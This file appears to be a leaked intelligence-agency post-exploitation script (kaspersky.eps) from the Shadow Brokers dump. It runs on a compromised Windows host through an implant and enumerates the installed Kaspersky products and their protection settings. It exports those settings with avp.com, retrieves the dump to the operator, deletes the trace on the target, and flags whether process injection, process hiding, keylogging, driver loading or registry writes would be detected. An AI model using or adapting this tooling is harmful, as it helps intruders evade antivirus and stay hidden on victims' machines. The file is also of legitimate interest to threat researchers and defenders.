shadowbrokers-exploits/windows/Resources/Ep/Scripts/PSP/kaspersky.eps
2017-04-14 11:45:07 +02:00

1192 lines
29 KiB
PostScript

#-----------------------------------------------------------------------------
# File: PSP\kaspersky.eps
# Description: Checks Kaspersky settings via avp.com
#
# Currently no FW (Anti_Hacker) queries
#
# This script handles the following Kaspersky versions:
# 6.0 - KIS, KAV, FM
# 7.0 - KIS, KAV, FM
# 8.0 - very limited, only performs versioning. no settings are queried
#
# 2008-07-08 - First Release
# 2008-08-08 - Added a lot more error checking
# Background checksum of avp.com
# Failout if avp.exe not in ps (After initial reg queries)
# 2008-08-20 - Re-introduced some inline registry queries to check for
# unmatched settinsg (reg vs. avp.com).
# Detects klnagent.exe and pulls the server ip
# 2008-11-14 - removed env safeties for KAV file server
# added ability to handle KAVFSEE (file server enterprise edition)
#-----------------------------------------------------------------------------
@include "PerlFunctions.epm";
@include "PSPHelpers.epm";
@include "_NormalizePath.epm";
@include "_ProcessList.epm";
bool $debug = false;
if($argc != 1) { echo "DEBUG: ON"; $debug = true; }
# return value
string $ret;
# The struct is defined in PSPHelpers.epm
metaData @metaData;
string %envs;
#initialize the struct
init(@metaData, %envs);
%envs{'noProcInfo'} = "FALSE";
@metaData.$vendor = "Kaspersky";
echo "Starting Kaspersky check";
@echo off;
string $auditing = GetEnv("AUDITOFF");
if ($auditing == "TRUE"){
echo "Verified auditing was off/has been dorked. Moving on";
}else{
echo "auditing still on!";
}
# will be set below with product type info
string $tempFile = "~klset.txt";
# Dataroot Directory (e.g., logs directory)
string $dataroot = "";
# Report Directory where log files are stored
string $report = "";
# Quarantine Directory
string $quarantine = "";
# Product Root (e.g., installation directory)
string $productRoot = "";
string $productType = "";
int $version = 6;
# Registry query value
string $value;
# registry query (sub)key
string $key;
# registry query base (used in conjuction with $key)
string $reg_base = "";
# Informational string about the settings of the box
string $data = "";
string $scriptsPath = GetEnv("ScriptsDir");
_NormalizePath($scriptsPath);
# Is this an MP4 release
bool $mp4 = false;
@record on;
if (`regquery -hive L -subkey "software\\kasperskylab\\protected\\AVP80"`) {
undef($ret);
undef($value);
$key = "software\\kasperskylab\\protected\\AVP80\\environment";
$value[0] = "ProductName";
$value[1] = "ProductVersion";
$value[2] = "ProductType";
if(reg_query($key, $value, $ret, true))
{
echo "";
$productType = $ret[2];
}
else
{
if(query_failed())
{
@metaData.$information = $data;
writeData(@metaData, %envs);
return true;
}
}
$version = 6;
$mp4 = true;
$reg_base = "software\\kasperskylab\\protected\\AVP80";
string $productString = "Kaspersky Anti-Virus 6.0";
if ($productType == "wks") {
$productString = "$productString for Windows Workstations MP4";
} else if ($productType == "fs") {
$productString = "$productString for Windows Servers MP4";
} else {
$productString = "$productString MP4";
}
echo "";
echo "Product Name: $productString";
echo " *** Not original KAV 6.0. This was released late 2009 *** ";
@metaData.$product = $productString;
@metaData.$version = "6.0.4";
}
else if(`regquery -hive L -subkey "software\\kasperskylab\\AVP6"`)
{
echo "Found registry keys for Kaspersky 6.0.";
$version = 6;
$reg_base = "software\\kasperskylab\\AVP6";
@metaData.$product = "Kaspersky 6.0";
@metaData.$version = "6";
}
else if(`regquery -hive L -subkey "software\\kasperskylab\\protected\\AVP7"`)
{
echo "Found registry keys for Kaspersky 7.0.";
$version = 7;
$reg_base = "software\\kasperskylab\\protected\\AVP7";
@metaData.$product = "Kaspersky 7.0";
@metaData.$version = "7";
@record on;
`getnetaddr`;
@record off;
int $remote_peer_port = GetCmdData("remote_peer_port");
int $remote_port = GetCmdData("remote_port");
echo "";
echo "NOTE: Kaspersky 7 *can* create popups for traffic over \"encrypted\" ports.";
echo "If you're using one of these ports (including 443)...";
echo "you may already be in trouble.";
echo " Remote peer port: $remote_peer_port";
echo "Current implant port: $remote_port";
}
else if(`regquery -hive L -subkey "software\\kasperskylab\\KAVFSEE\\6.0"`)
{
#echo "Found registry keys for Kaspersky Anti-Virus 6.0 for Windows File Servers Enterprise Edition";
$version = 6;
@metaData.$product = "Kaspersky Anti-Virus 6.0 for Windows File Servers Enterprise Edition";
@metaData.$version = "6";
undef($ret);
undef($value);
$key = "software\\kasperskylab\\Components\\34\\Connectors\\KAVFSEE\\6.0.0.0";
$value[0] = "ProdDisplayName";
$value[1] = "ProdVersion";
if(reg_query($key, $value, $ret, true))
{
echo "";
echo "Product Name: $ret[0]";
$productType = "fsee";
echo "Product Type: $productType";
echo " Version: $ret[1]";
}
else
{
if(query_failed())
{
@metaData.$information = $data;
writeData(@metaData, %envs);
return true;
}
}
$data = "$productType";
echo "";
echo "This Kaspersky installation is AV only.";
echo "";
%envs{'noDriver'} = "FALSE";
%envs{'noHide'} = "FALSE";
%envs{'noInject'} = "FALSE";
%envs{'noKeyboard'} = "FALSE";
%envs{'noRegistry'} = "FALSE";
@metaData.$information = $data;
writeData(@metaData, %envs);
return true;
}
else if(`regquery -hive L -subkey "software\\kasperskylab\\InstalledProducts\\Kaspersky Anti-Virus Personal"` ||
`regquery -hive L -subkey "software\\kasperskylab\\InstalledProducts\\Kaspersky Anti-Virus for Workstation"`)
{
echo "";
string $values = GetCmdData("value");
string $data = GetCmdData("value_data");
string $value;
bool $flag = false;
int $i = 0;
foreach $value ($values)
{
if($value == "Name") { echo " Product Name: $data[$i]"; @metaData.$product = "$data[$i]"; }
if($value == "Version")
{
echo "Product Version: $data[$i]";
$version = <int>$data[$i];
@metaData.$version="$data[$i]";
$flag = true;
}
$i++;
}
string $ver = "";
ifnot($flag == true)
{
$i = 0;
string $tmp;
foreach $value ($values)
{
if(($value == "VersionMajor") || ($value == "VerMajor"))
{
$tmp = $data[$i];
remove_zeroes($tmp);
$version = <int>$tmp;
hex2dec($tmp);
$ver = "$tmp";
}
else if(($value == "VersionMinor") || ($value == "VerMinor"))
{
$tmp = $data[$i];
remove_zeroes($tmp);
hex2dec($tmp);
$ver = "$ver.$tmp";
}
else if(($value == "VersionBuild") || ($value == "VerBuild"))
{
$tmp = $data[$i];
remove_zeroes($tmp);
hex2dec($tmp);
$ver = "$ver.$tmp";
}
$i++;
}
echo "Product Version: $ver";
}
echo "";
@metaData.$information = $data;
writeData(@metaData, %envs);
return true;
}
else if(`regquery -hive L -subkey "software\\kasperskylab\\protected\\AVP8"`)
{
echo "Found registry keys for Kaspersky 8.0 (aka Kaspersky 2009).";
$version = 8;
$reg_base = "software\\kasperskylab\\protected\\AVP8";
@metaData.$product = "Kaspersky 8.0";
@metaData.$version = "8";
}
else if (`regquery -hive L -subkey "software\\kasperskylab\\protected\\AVP9"`)
{
echo "Found registry keys for Kaspersky 9.0 (aka Kaspersky 2010).";
$version = 9;
$reg_base = "software\\kasperskylab\\protected\\AVP9";
@metaData.$product = "Kaspersky 9.0";
@metaData.$version = "9";
}
else
{
echo "Did not find a known Kaspersky installation.";
echo "";
if(prompt "Do you want to recursively dump HKLM\\Software\\KasperskyLab? (NOTE: this can produce a large result set)")
{
@echo on;
`background log regquery -recursive -hive L -subkey "software\\kasperskylab"`;
@echo off;
}
@metaData.$information = $data;
writeData(@metaData, %envs);
return false;
}
# Environment
undef($ret);
undef($value);
$key = "$reg_base\\environment";
if($version < 8)
{
$value[0] = "Components";
$value[1] = "DataRoot";
$value[2] = "ProductName";
$value[3] = "ProductRoot";
$value[4] = "ProductType";
$value[5] = "ProductVersion";
$value[6] = "Quarantine";
$value[7] = "Report";
}
else
{
$value[0] = "Build";
$value[1] = "DataRoot";
$value[2] = "ProductName";
$value[3] = "ProductRoot";
$value[4] = "ProductType";
$value[5] = "ProductVersion";
$value[6] = "Quarantine";
$value[7] = "Report";
}
if(reg_query($key, $value, $ret, true))
{
echo "";
echo "Product Name: $ret[2]";
$productType = $ret[4];
echo "Product Type: $productType";
echo " Version: $ret[5]";
if($version < 8) { echo " Components: $ret[0]"; }
echo "";
$dataroot = $ret[1];
$report = $ret[7];
string $r = split("\%\\", $report);
$report = "$dataroot\\$r[1]";
$quarantine= $ret[6];
$r = split("\%\\", $quarantine);
$quarantine = "$dataroot\\$r[1]";
$productRoot = "$ret[3]";
_NormalizePath($productRoot);
$tempFile = "~kl$ret[4]set.txt";
#pause;
}
else
{
if(query_failed())
{
@metaData.$information = $data;
writeData(@metaData, %envs);
return true;
}
}
@metaData.$product = "$ret[2] ($ret[4])";
@metaData.$version = "$ret[5]";
@metaData.$logFile = "$report";
@metaData.$quarantine = "$quarantine";
$data = "$productType";
string $components = "$ret[0]";
replace($components, ";", ",");
if($version < 8) { $data = "$data|Components:$components"; }
if($productType == "fs")
{
echo "This Kaspersky installation is AV only.";
echo "Verify by checking the Components list above.";
echo "";
%envs{'noDriver'} = "FALSE";
%envs{'noHide'} = "FALSE";
%envs{'noInject'} = "FALSE";
%envs{'noKeyboard'} = "FALSE";
%envs{'noRegistry'} = "FALSE";
@metaData.$information = $data;
writeData(@metaData, %envs);
return true;
}
int $ids;
string $names;
ifnot(_GetProcessList($ids, $names))
{
echo "Error getting process list.";
@metaData.$information = $data;
writeData(@metaData, %envs);
return false;
}
string $name;
string $inList = "false";
foreach $name ($names)
{
if($name == "klnagent.exe" || $name == "KLNAGENT.EXE") { $inList = "true"; break; }
}
if($inList == "true")
{
echo "Target is part of the Kaspersky Administration Kit.";
undef($ret);
undef($value);
string $settingsKey = SplitPath($reg_base);
$key = "$settingsKey\\Components\\34";
$value[0] = "SS_SETTINGS";
if(reg_query($key, $value, $ret, true))
{
#echo "Settings file: $ret[0]";
if(prompt "Do you want to retrieve the klnaggent settings file (to retrieve the server IP)?")
{
ifnot(`get "$ret[0]" -foreground`)
{
echo "Error getting \"$ret[0]\"";
echo "";
}
else
{
string $settingsFile = SplitPath("$ret[0]");
undef($ret);
getLastFile($settingsFile[1], $ret);
@record on;
`local run -command "perl $scriptsPath\\PSP\\kl_settings_parser.pl $ret" -redirect`;
@record off;
string $kl_server_ip = GetCmdData("output");
echo "Kaspersky Administration Server IP: $kl_server_ip";
}
}
echo "";
}
else
{
if(query_failed())
{
@metaData.$information = $data;
writeData(@metaData, %envs);
return true;
}
}
}
ifnot(prompt "Continue")
{
@metaData.$information = $data;
writeData(@metaData, %envs);
return false;
}
$name;
$inList = "false";
foreach $name ($names)
{
if($name == "avp.exe" || $name == "AVP.EXE") { $inList = "true"; break; }
}
if($inList == "false")
{
echo "";
echo "avp.exe not found in the process list";
echo "";
@metaData.$information = $data;
writeData(@metaData, %envs);
return false;
}
echo "";
echo "Checking for avp.com ...";
@record on;
`dir "$productRoot\\avp.com"`;
@record off;
string $tmp = getCmdData("name");
ifnot(defined($tmp))
{
echo "Could not find avp.com";
@metaData.$information = $data;
writeData(@metaData, %envs);
return false;
}
else
{
echo "Found avp.com in the following folder:";
echo "$productRoot";
}
echo "";
@echo on;
`fileperms -file "$productRoot\\avp.com"`;
@echo off;
echo "Check to make sure you have permissions to run this file";
ifnot(prompt "Continue")
{
@metaData.$information = $data;
writeData(@metaData, %envs);
return false;
}
# Touch/Checksum avp.com for backtracking purposes
@record on;
`checksum -mask avp.com -path "$productRoot"`;
@record off;
string $checksum = GetCmdData("checksum_value");
ifnot(defined($checksum))
{
echo "\nError checksumming \"$productRoot\\avp.com\"\n";
@metaData.$information = $data;
writeData(@metaData, %envs);
return false;
}
#echo "md5(avp.com): $checksum";
#string $tempPath = "$report\\..\\..";
string $tempPath = GetEnv("tmppath");
_NormalizePath($tempPath);
echo "";
echo "Do you want to dump Kaspersky settings to:";
echo "\"$tempPath\\$tempFile\"";
echo "This involves the following run -command:";
echo "";
echo "----------";
echo "run -command \"\\\"$productRoot\\avp.com\\\" export rtp \\\"$tempPath\\$tempFile\\\"\"";
echo "----------";
echo "";
echo "!!! WARNING: If Kaspersky (avp.exe) is not in the process list, get help!";
echo "";
echo "The result is usually >200K.";
echo "Also, additional registry queries will be run, some may take while.";
echo "";
if(prompt "")
{
echo "";
echo "Dumping Kaspersky settings ...";
#@echo on;
ifnot(`run -command "\\"$productRoot\\avp.com\\" export rtp \\"$tempPath\\$tempFile\\""`)
{
echo "Error when trying to run:";
echo "\trun -command \"$productRoot\\avp.com\" export rtp \"$tempPath\\$tempFile\"";
@echo off;
echo "Listing \"$productRoot\"";
`dir * -path "$productRoot" -recursive -max 0`;
echo "Listing \"$dataRoot\"";
`dir * -path "$dataRoot" -recursive -max 0`;
@metaData.$information = $data;
writeData(@metaData, %envs);
return false;
}
echo "Getting \"$tempFile\" ...";
ifnot(`get "$tempPath\\$tempFile" -foreground`)
{
echo "Error getting \"$tempPath\\$tempFile\"";
echo "";
@echo on;
`dir * -path "$tempPath"`;
@echo off;
echo "";
echo "Check for $tempFile and delete if it exists:";
echo "";
@metaData.$information = $data;
writeData(@metaData, %envs);
return false;
}
echo "Deleting \"$tempFile\" ...";
ifnot(`del "$tempFile" -path "$tempPath"`)
{
echo "Error deleting \"$tempPath\\$tempFile\"";
echo "";
@echo on;
`dir * -path "$tempPath"`;
@echo off;
echo "";
echo "Check for $tempFile and delete if it exists:";
echo "";
@metaData.$information = $data;
writeData(@metaData, %envs);
return false;
}
}
echo "";
@echo on;
`dir "$tempFile" -path "$tempPath"`;
@echo off;
echo "";
undef($ret);
getLastFile($tempFile, $ret);
#string $scriptsPath = GetEnv("ScriptsDir");
#_NormalizePath($scriptsPath);
$scriptsPath = "$scriptsPath\\PSP";
@record on;
if ($mp4) {
`local run -command "perl $scriptsPath\\kaspersky_mp4.pl $ret" -redirect`;
} else {
`local run -command "perl $scriptsPath\\kaspersky.pl $ret" -redirect`;
}
@record off;
$ret = GetCmdData("output");
string $results = split("\t", $ret);
echo "hello ...";
if($version == 8)
{
echo "Settings have been pulled back.";
echo "No parsing done.";
echo "Recommend checking guidance.";
echo "";
@metaData.$information = $data;
writeData(@metaData, %envs);
return true;
}
if ($version == 9)
{
echo "Settings have been pulled back.";
echo "No parsing done.";
echo "Recommend checking guidance.";
echo "";
@metaData.$information = $data;
writeData(@metaData, %envs);
return true;
}
string $pdm_base;
if ($mp4) {
$pdm_base = "$reg_base\\profiles\\behavior_blocking2\\profiles\\pdm2";
} else {
$pdm_base = "$reg_base\\profiles\\behavior_blocking\\profiles\\pdm";
}
echo "==================== avp.com results ====================";
echo "hello ....";
echo "Product Name: $results[0]";
echo " Version: $results[1]";
echo "Install Path: $results[2]";
echo "";
if($results[3] == "no")
{
undef($ret);
undef($value);
$key = "$reg_base";
$value[0] = "enabled";
if(reg_query($key, $value, $ret, true))
{
if($ret[0] != "00000000") { mismatchError("Kaspersky Protection"); }
else
{
echo "Kaspersky Protection: OFF (made in the shade)";
echo "";
$data = "$data|Protection:OFF";
%envs{'noDriver'} = "FALSE";
%envs{'noHide'} = "FALSE";
%envs{'noInject'} = "FALSE";
%envs{'noKeyboard'} = "FALSE";
%envs{'noRegistry'} = "FALSE";
}
}
else
{
if(query_failed())
{
@metaData.$information = $data;
writeData(@metaData, %envs);
return true;
}
}
}
else
{
echo "Kaspersky Protection: ON";
echo "";
$data = "$data|Protection:ON";
if($results[4] == "no")
{
undef($ret);
undef($value);
if ($mp4) {
$key = "$reg_base\\profiles\\Behavior_Blocking2";
} else {
$key = "$reg_base\\profiles\\behavior_blocking";
}
$value[0] = "enabled";
if(reg_query($key, $value, $ret, true))
{
if($ret[0] != "00000000") { mismatchError("Behavior Blocking"); }
else
{
echo "Behavior Blocking: OFF";
$data = "$data|BehaviorBlocking:OFF";
%envs{'noDriver'} = "FALSE";
%envs{'noHide'} = "FALSE";
%envs{'noInject'} = "FALSE";
%envs{'noKeyboard'} = "FALSE";
%envs{'noRegistry'} = "FALSE";
}
}
else
{
if(query_failed())
{
@metaData.$information = $data;
writeData(@metaData, %envs);
return true;
}
}
}
else
{
$data = "$data|BehaviorBlocking:ON";
echo "Behavior Blocking: ON";
if($results[22] == "no")
{
#################################################################
# This will fail under MP4 as I don't yet understand the settings
#################################################################
undef($ret);
undef($value);
$key = "$reg_base\\profiles\\behavior_blocking\\profiles\\pdm\\settings";
$value[0] = "bBehaviourEnabled";
if(reg_query($key, $value, $ret, true))
{
if($ret[0] != "00000000") { mismatchError("Application Activity Analyzer"); }
else
{
echo "\tApplication Activity Analyzer: OFF";
$data = "$data|ApplicationActivityAnalyzer:OFF";
}
}
else
{
if(query_failed())
{
@metaData.$information = $data;
writeData(@metaData, %envs);
return true;
}
}
}
else
{
echo "\tApplication Activity Analyzer: ON";
$data = "$data|ApplicationActivityAnalyzer:ON";
if($results[5] == "no")
{
undef($ret);
undef($value);
$key = "$pdm_base\\settings\\Set\\0000";
$value[0] = "bEnabled";
if(reg_query($key, $value, $ret, true))
{
if($ret[0] != "00000000") { mismatchError("Dangerous Behavior"); }
else
{
echo "\t\tDangerous Behavior: OFF";
$data = "$data|DangerousBehavior:OFF";
%envs{'noRegistry'} = "FALSE";
%envs{'noDriver'} = "FALSE";
}
}
else
{
if(query_failed())
{
@metaData.$information = $data;
writeData(@metaData, %envs);
return true;
}
}
}
else
{
$data = "$data|DangerousBehavior:ON";
echo "\t\tDangerous Behavior: ON (DON'T Write to services key)";
#SetEnv("noRegistry","TRUE");
%envs{'noRegistry'} = "TRUE";
%envs{'noDriver'} = "TRUE";
undef($ret);
bbAction($results[6], $ret);
echo "$ret";
$data = "$data|DangerousBehaviorAction:$results[6]";
echo "\t\t\tLogging: $results[7]";
$data = "$data|DangerousBehaviorLogging:$results[7]";
echo "\t\t\tQuarantine: $results[8]";
$data = "$data|DangerousBehaviorQuarantine:$results[8]";
}
if($results[9] == "no")
{
undef($ret);
undef($value);
$key = "$pdm_base\\settings\\Set\\0002";
$value[0] = "bEnabled";
if(reg_query($key, $value, $ret, true))
{
if($ret[0] != "00000000") { mismatchError("Process Injection"); }
else
{
echo "\t\tProcess Injection Detection: OFF";
$data = "$data|ProcessInjection:OFF";
%envs{'noInject'} = "FALSE";
}
}
else
{
if(query_failed())
{
@metaData.$information = $data;
writeData(@metaData, %envs);
return true;
}
}
}
else
{
$data = "$data|ProcessInjection:ON";
echo "\t\tProcess Injection Detection: ON (DON'T Process inject)";
#SetEnv("noInject","TRUE");
%envs{'noInject'} = "TRUE";
undef($ret);
bbAction($results[10], $ret);
echo "$ret";
$data = "$data|ProcessInjectionAction:$results[10]";
echo "\t\t\tLogging: $results[11]";
$data = "$data|ProcessInjectionLogging:$results[11]";
echo "\t\t\tQuarantine: $results[12]";
$data = "$data|ProcessInjectionQuarantine:$results[12]";
}
if($results[13] == "no")
{
undef($ret);
undef($value);
$key = "$pdm_base\\settings\\Set\\0003";
$value[0] = "bEnabled";
if(reg_query($key, $value, $ret, true))
{
if($ret[0] != "00000000") { mismatchError("Process Hiding"); }
else
{
echo "\t\tProcess Hiding Detection: OFF";
$data = "$data|ProcessHiding:OFF";
%envs{'noHide'} = "FALSE";
}
}
else
{
if(query_failed())
{
@metaData.$information = $data;
writeData(@metaData, %envs);
return true;
}
}
}
else
{
$data = "$data|ProcessHiding:ON";
echo "\t\tProcess Hiding Detection: ON (DON't Process Hide)";
#SetEnv("noHide","TRUE");
%envs{'noHide'} = "TRUE";
undef($ret);
bbAction($results[14], $ret);
echo "$ret";
$data = "$data|ProcessHidingAction:$results[14]";
echo "\t\t\tLogging: $results[15]";
$data = "$data|ProcessHidingLogging:$results[15]";
echo "\t\t\tQuarantine: $results[16]";
$data = "$data|ProcessHidingQuarantine:$results[16]";
}
ifnot($productType == "kav")
{
if($results[17] == "no")
{
undef($ret);
undef($value);
$key = "$pdm_base\\settings\\Set\\0007";
$value[0] = "bEnabled";
if(reg_query($key, $value, $ret, true))
{
if($ret[0] != "00000000") { mismatchError("Keylogger Detection"); }
else
{
echo "\t\tKeylogger Detection: OFF";
$data = "$data|KeyloggerDetection:OFF";
%envs{'noKeyboard'} = "FALSE";
}
}
else
{
if(query_failed())
{
@metaData.$information = $data;
writeData(@metaData, %envs);
return true;
}
}
}
else
{
$data = "$data|KeyloggerDetection:ON";
echo "\t\tKeyLogger Detection: ON (DON'T Monitor the keyboard)";
#SetEnv("noKeyboard","TRUE");
%envs{'noKeyboard'} = "TRUE";
undef($ret);
bbAction($results[18], $ret);
echo "$ret";
$data = "$data|KeyloggerDetectionAction:$results[18]";
echo "\t\t\tLogging: $results[19]";
$data = "$data|KeyloggerDetectionLogging:$results[19]";
echo "\t\t\tQuarantine: $results[20]";
$data = "$data|KeyloggerDetectionQuarantine:$results[20]";
}
}
}
undef($ret);
undef($value);
$key = "$reg_base\\profiles\\behavior_blocking\\profiles\\pdm\\settings";
$value[0] = "bAppMonitoring_Enabled";
$value[1] = "bRegMonitoring_Enabled";
string $appMonitoring = "";
string $regMonitoring = "";
# Don't see these here in MP4...
# Reg guard settings controlled by software\kasperskylab\protected\AVP80\profiles\Behavior_Blocking2\profiles\regguard2 enabled
ifnot($mp4) {
if(reg_query($key, $value, $ret, true))
{
$appMonitoring = "$ret[0]";
$regMonitoring = "$ret[1]";
}
else
{
if(query_failed())
{
@metaData.$information = $data;
writeData(@metaData, %envs);
return true;
}
}
}
if($results[30] == "no")
{
if($appMonitoring != "00000000") { mismatchError("Application Integrity Control"); }
else
{
echo "\tApplication Integrity Control: OFF";
$data = "$data|ApplicationIntegrityControl:OFF";
}
}
else
{
echo "\tApplication Integrity Control: ON (DON't Install PC)";
$data = "$data|ApplicationIntegrityControl:ON";
}
if($results[21] == "no")
{
if($regMonitoring != "00000000") { mismatchError("Registry Guard"); }
else
{
echo "\tRegistry Guard: OFF";
$data = "$data|RegistryGuard:OFF";
%envs{'noRegistry'} = "FALSE";
}
}
else
{
$data = "$data|RegistryGuard:ON";
#SetEnv("noRegistry","TRUE");
%envs{'noRegistry'} = "TRUE";
echo "\tRegistry Guard: ON (DON'T Install PC)";
echo "\t\t!!! Losing connection will probably cause a popup !!!";
echo "\t\t!!! Make sure you know what you're doing !!!";
echo "\t\t!!! Check guidance! !!!";
}
}
if($results[23] == "no")
{
#if($results[17] == "no")
#{
undef($ret);
undef($value);
$key = "$reg_base\\profiles\\File_Monitoring";
$value[0] = "enabled";
if(reg_query($key, $value, $ret, true))
{
if($ret[0] != "00000000") { mismatchError("File Monitoring"); }
else
{
echo "File Monitor: OFF";
$data = "$data|FileMonitoring:OFF";
}
}
else
{
if(query_failed())
{
@metaData.$information = $data;
writeData(@metaData, %envs);
return true;
}
}
#}
}
else
{
$data = "$data|FileMonitoring:ON";
echo "File Monitor: ON";
if($results[24] == "00000000") { echo "\tLevel: $results[24] (Default|Recommended)"; }
if($results[24] == "00000002") { echo "\tLevel: $results[24] (Low)"; }
if($results[24] == "00000003") { echo "\tLevel: $results[24] (High)"; }
$data = "$data|FileMonitoringLevel:$results[24]";
echo "\tScan Packed: $results[25]";
$data = "$data|FileMonitoringScanPacked:$results[25]";
echo "\tScan Action: $results[26]";
$data = "$data|FileMonitoringScanAction:$results[26]";
echo "\tDisinfect: $results[27]";
$data = "$data|FileMonitoringDisinfect:$results[27]";
Echo "\tDelete: $results[28]";
$data = "$data|FileMonitoringDelete:$results[28]";
echo "\tDelete Container: $results[29]";
$data = "$data|FileMonitoringDeleteContainer:$results[29]";
}
}
echo "";
echo "=========================================================";
echo "";
@metaData.$information = $data;
writeData(@metaData, %envs);
if($debug)
{
echo "";
echo "";
echo "";
string $result;
int $i = 0;
foreach $result ($results)
{
echo "$i --- $result";
$i++;
}
echo "";
echo "";
foreach $result (keys %envs)
{
echo "$result: %envs{'$result'}";
}
}
return true;
sub writeData(IN metaData @metaData, IN string %envs)
{
if(writeMetaData(@metaData, %envs)){
echo "Wrote meta data to disk";
}else{
echo "ERROR. could not write meta data to disk. ERROR";
}
return true;
}
sub bbAction(IN string $data, REF string $ret)
{
$ret = "\t\t\tAction: $data";
string %translations;
%translations{'00000000'} = "$ret (ALLOWED)";
%translations{'00000001'} = "$ret (ASK USER)";
%translations{'00000003'} = "$ret (TERMINATE/BLOCK)";
string $key;
foreach $key (keys %translations)
{
if($data == $key) { $ret = "%translations{'$key'}"; break; }
}
return true;
}
# Search through the GetFilse directory for the settings dump
# Returns the more recent settinsg dump
sub getLastFile(IN string $tempFile, REF string $ret)
{
@record on;
`getdirectory -logs`;
@record off;
string $dir = GetCmdData("dir");
@echo off;
@record on;
`local dir $tempFile* -path $dir\\Get_Files`;
@record off;
string $filePath = GetCmdData("path");
string $fileName = GetCmdData("name");
_NormalizePath($filePath[0]);
string $currPath;
string $currName;
int $i = 0;
while(defined($fileName[$i]))
{
$currPath = $filePath[$i];
$currName = $fileName[$i];
$i++;
}
@echo on;
`local mkdir "$currPath\\NOSEND"`;
`local move "$currPath\\$currName" "$currPath\\NOSEND\\$currName"`;
@echo off;
$ret = "$currPath\\NOSEND\\$currName";
return true;
}
# Failure case if regquery fails
sub query_failed()
{
echo "";
echo "Registry query failure";
echo "";
if(prompt "Do you want to recursively dump HKLM\\Software\\KasperskyLab?\n(NOTE: this can produce a large result set)")
{
@echo on;
`background log regquery -recursive -hive L -subkey "software\\kasperskylab"`;
@echo off;
}
if(prompt "Do you want to exit")
{
return true;
}
return false;
}
# Remove preceeding zeros from a string
sub remove_zeroes(REF string $data)
{
string $split = split("0", $data);
undef($data);
$data = "0";
string $tmp;
foreach $tmp ($split)
{
if($tmp != "") { $data = $tmp; break; }
}
return true;
}
# Output error message if settings from avp.com and the registry do not match
sub mismatchError(IN string $category)
{
echo "";
echo "**********!!!!!!!!!!**********";
echo "Settings from avp.com don't match the registry for \"$category\".";
echo "Assume that \"$category\" is ON";
echo "You should probably get help.";
echo "**********!!!!!!!!!!**********";
echo "";
return true;
}